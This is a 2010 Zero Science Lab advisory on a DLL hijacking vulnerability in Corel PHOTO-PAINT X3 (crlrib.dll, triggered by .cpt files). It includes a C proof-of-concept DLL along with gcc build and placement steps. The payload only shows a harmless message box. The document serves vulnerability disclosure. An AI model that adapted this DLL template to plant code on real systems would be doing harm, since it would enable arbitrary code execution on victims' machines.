Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

2010-08-26T00:00:00
ID ZSL-2010-4954
Type zeroscience
Reporter Gjoko Krstic
Modified 2010-08-26T00:00:00

Description

Title: Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit
Advisory ID: ZSL-2010-4954
Type: Local/Remote
Impact: System Access
Risk: (4/5)
Release Date: 26.08.2010

Summary

Graphic design software for striking visual communication.

Description

Corel PHOTO-PAINT X3 suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level. The vulnerable extension is .cpt thru crlrib.dll library.

Vendor

Corel Corporation - <http://www.corel.com>

Affected Version

X3 v13.0.0.576

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

corelpp_dll.c

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>

References

[1] <http://www.exploit-db.com/exploits/14787>
[2] <http://www.packetstormsecurity.org/filedesc/corelpp_dll.txt.html>
[3] <http://securityreason.com/exploitalert/8770>
[4] <http://secunia.com/advisories/41148/>
[5] <http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/>
[6] <http://www.exploit-db.com/dll-hijacking-vulnerable-applications/>
[7] <http://www.securityfocus.com/bid/42753>
[8] <http://osvdb.org/show/osvdb/67582>

Changelog

[26.08.2010] - Initial release
[27.08.2010] - Added reference [1], [2], [3], [4], [5] and [6]
[13.11.2010] - Added reference [7] and [8]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

                                        
                                            /*

 Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

 Vendor: Corel Corporation
 Product Web Page: http://www.corel.com
 Affected Version: X3 v13.0.0.576

 Summary: Graphic design software for striking visual communication.

 Desc: Corel PHOTO-PAINT X3 suffers from a dll hijacking vulnerability
 that enables the attacker to execute arbitrary code on a local level. The
 vulnerable extension is .cpt thru crlrib.dll library.

 ----
 gcc -shared -o crlrib.dll corelpp.c

 Compile and rename to crlrib.dll, create a file test.cpt and
 put both files in same dir and execute.
 ----

 Tested on Microsoft Windows XP Professional SP3 (EN)



 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 liquidworm gmail com

 Zero Science Lab - http://www.zeroscience.mk


 25.08.2010

*/


#include &lt;windows.h&gt;

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

	switch (fdwReason)
	{
		case DLL_PROCESS_ATTACH:
		dll_mll();
		case DLL_THREAD_ATTACH:
		case DLL_THREAD_DETACH:
		case DLL_PROCESS_DETACH:
		break;
	}

	return TRUE;
}

int dll_mll()
{
	MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}